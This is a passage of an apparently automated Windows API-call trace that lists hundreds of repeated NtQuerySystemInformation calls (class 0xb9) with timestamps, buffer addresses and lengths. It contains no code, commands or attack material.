Length=0x20, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd90, Length=0x20, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x20, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x20, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de40, Length=0x20, ResultLength=0x0) [0233.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de70, Length=0x20, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de10, Length=0x20, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de10, Length=0x20, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dcf0, Length=0x28, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd00, Length=0x48, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x28, ResultLength=0x0) [0233.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x28, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x48, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd00, Length=0x48, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x28, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x28, ResultLength=0x0) [0233.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x40, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0233.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x28, ResultLength=0x0) [0233.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x28, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7f0, Length=0x20, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x20, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x20, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbd0, Length=0x50, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dac0, Length=0x50, ResultLength=0x0) [0233.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x38, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x28, ResultLength=0x0) [0233.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.441] 